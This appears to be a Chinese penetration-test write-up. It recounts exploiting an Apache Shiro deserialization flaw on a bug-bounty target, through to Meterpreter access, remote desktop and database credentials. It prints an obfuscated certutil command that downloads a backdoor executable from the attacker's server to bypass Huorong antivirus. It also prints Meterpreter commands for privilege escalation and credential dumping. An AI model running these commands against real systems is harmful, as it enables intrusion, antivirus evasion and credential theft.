记一次Shiro反序列化到远程桌面

女爷i 2024-04-07 10:39 106阅读 0赞

首先在奇安信hunter上搜索找到该SRC的有关资产(具体我就不放了),然后通过微步来搜索子域名找到今天的测试站点。

35f565f2f18d5fcf1bdf3c3ffa0d0161.jpeg

然后利用xray中检测到该站点存在Shiro反序列化漏洞

72570939adc055483d4a78715be49820.jpeg

于是考虑直接用feihong的反序列话工具,但是这次feihong的反序列化工具只检测出key,gatget没有检测出来,咨询了同事琛哥后,故考虑到是因为工具很久没更新,需要找一条CB的链,啪的一下回车

9cfd62dc4aa9a6389a6bfce677774464.jpeg

直接开冲,先看下系统中是否存在杀毒软件,一目了然,系统中存在火绒杀毒软件。

c2ddd948ceefe1ebd1c9a79e19df0ab2.jpeg

84fefb19100f5c6c256db5daaa0bd85f.jpeg

在确定了目标系统存在火绒后我第一时间尝试了hta上线,相关文章内容:记一次绕过火绒安全提权实战案例

不过很可惜这个方法我在本地多次尝试后发现火绒已经对这个方法进行了拦截和查杀。

后续和3h师傅交流应该是对文件的特征进行了查杀,不过也没有在深一步探索绕过的方法。

c4d4d6eb70f40b9a2798f9b2b22986d7.jpeg

题外话:这里测试的时候有一个小坑,感觉是工具的问题,工具在执行需要大量回显的数据包时会卡死,需要重新启动工具再执行一次命令才行。

这里绕过火绒选择了certutil远程下载方式,常规的cerutil直接下载肯定是不行的,于是想到了以前群里有师傅发过的变形版的certutil绕过方式。在本地测试后发现火绒没有拦截该命令,此时激动的小手已经焦躁不安。

  1. "c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe

题外话:发现目标系统不解析我vps的IP,搞得我晚上凌晨还在四处找人要VPS,感觉还是得随时准备一台国内的vps和国外的一台vps。

在找到vps后,先在工具上ping了一下vps的IP地址

88e57e48780a536517650939779db6fe.jpeg

可以解析到ip美滋滋,不过在下载之前还是最好看看目标服务器最近的登陆时间,以免被发现

9c1c8c6e2414c28e4d917a14d394f8b3.jpeg

直接开冲,首先在vps上启动一个临时的python web,命令如下。

  1. python -m SimpleHTTPServer 8888

75a84f7cc8dabd236505c94931d1c496.jpeg

然后先在本地测试一下,看看可不可以下载下来,OK,没问题!

3240d985d4ca5f6983bce0e124c50224.jpeg

现在直接到工具中在目标系统上执行,成功落地到当前路径下。

8986b6712ad921622b4f3a24a356832b.jpeg

执行dir命令查看是否成功下载到当前目录下

0448da905ea7f00194a8f1b67adbe1f7.jpeg

运行文件后上线

2b14fdc2dbf05242c7564e46e3e6a5d3.jpeg

查看系统版本

6f0a8de53b1b2634b0eacc5f3d36603e.jpeg

因为是高版本所以获取不到明文信息

2a1d43df24fed555b2b012b4874be6ad.jpeg

所以还有两个办法去远程连接, 一个是上传远控软件,另外一个就是直接添加用户。

先看第一个吧,使用截屏命令看看是否处于锁屏状态

221b84c3bbb5be66c20f459db193ae3e.jpeg

05a383f31e2117edd83d41860c8b1002.jpeg

由此可以判断当前机器应该是在锁屏中,所以这里只能我们自己添加一个用户上去。因为机器中存在火绒,所以还需要bypass火绒添加用户上去,方法我就暂时不放出来了(还请各位师傅见谅哈)

5a9d4f5ab080a2cf2ecb7e2042505772.jpeg

用户加入完成后就可以进行远程桌面连接了

现在即可进行连接了

728542aad5ef71ba5997eb8e89a540c8.jpeg

然后进来后翻到了一个配置文件,里面有数据库的信息

0e09255557478040cef7d3394c64d34e.jpeg

Mysql连接看看

1dd4c8dd8c94fc7008f2c206132e48b5.jpeg

总结

1.通过xray被动扫描探测出目标系统存在shiro反序化漏洞

2.先利用feihong的反序列话工具,但是这次feihong的反序列化工具只检测出key,gatget没有检测出来

3.通过shiro_attack-4.5-SNAPSHOT-all可成功反弹出目标系统shell(这里使用commonsBeanutils利用链)

4.首先执行命令个taslist/svc,通过Windows提权辅助工具(https://github.com/Ruiruigo/WinEXP或者https://i.hacking8.com/tiquan)。查询到

usysdiag.exe进程是火绒

5.通过变形版的certutil绕过火绒进行文件下载,可下载后门文件到目标系统中。

“c””e””r””t””u””t””i””l” -“u””r””l””c””a””c””h””e” -split -f https://url/1.exe 1.exe

6.在自己VPS上通过MSF生成反弹shell的后门文件123.exe(这里生成的123.exe需要免杀)

7.在自己的VPS上搭建http服务,并将123.exe放在运行SimpleHTTPServer 服务下。

python -m SimpleHTTPServer 8888

8.通过shiro_attack-4.5-SNAPSHOT-all的命令执行功能下载后门,并执行123.exe

“c””e””r””t””u””t””i””l” -“u””r””l””c””a””c””h””e” -split -f https://url/123.exe 123.exe

9.运行文件后上线成功,查看系统版本和补丁以及mimkatz出明文,因为是高版本所以获取不到明文信息

meterpreter>getuid //显示adminsitro权限

meterpreter>systeminfo //显示系统补丁

meterpreter>load_kiwi //加载mimikatz

meterpreter>getsystem // 进行提权

meterpreter>creds_wdigest //获取hash值

meterpeter>shell netstat - ano -p tcp | find “ 3389” //显示3389端口已开放

10.通过bypass绕过火绒添加用户,并将用户添加到管理员组

12.通过mstsc进行远程桌面登录,并在系统中发现目标网站的数据库配置文件的用户名和密码,这里可以上传格拉斯一句话,然后通过格拉斯自带的数据库管理模块,进行数据连接。

原文链接:

https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247494220&idx=1&sn=5009f9378aed90335f0bfe5e97f12a84&chksm=cfa54e5ff8d2c74969789d47eff9b9755fbd08b4d80e7a4dbc7f35534852c317bfd5d6fae0cd&scene=178&cur_album_id=1553386251775492098#rd

发表评论

表情:
评论列表 (有 0 条评论,106人围观)

还没有评论,来说两句吧...

相关阅读

    相关 序列序列

    序列化: 对象的序列化主要有两种用途:   1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;   2) 在网络上传送对象的字节序列。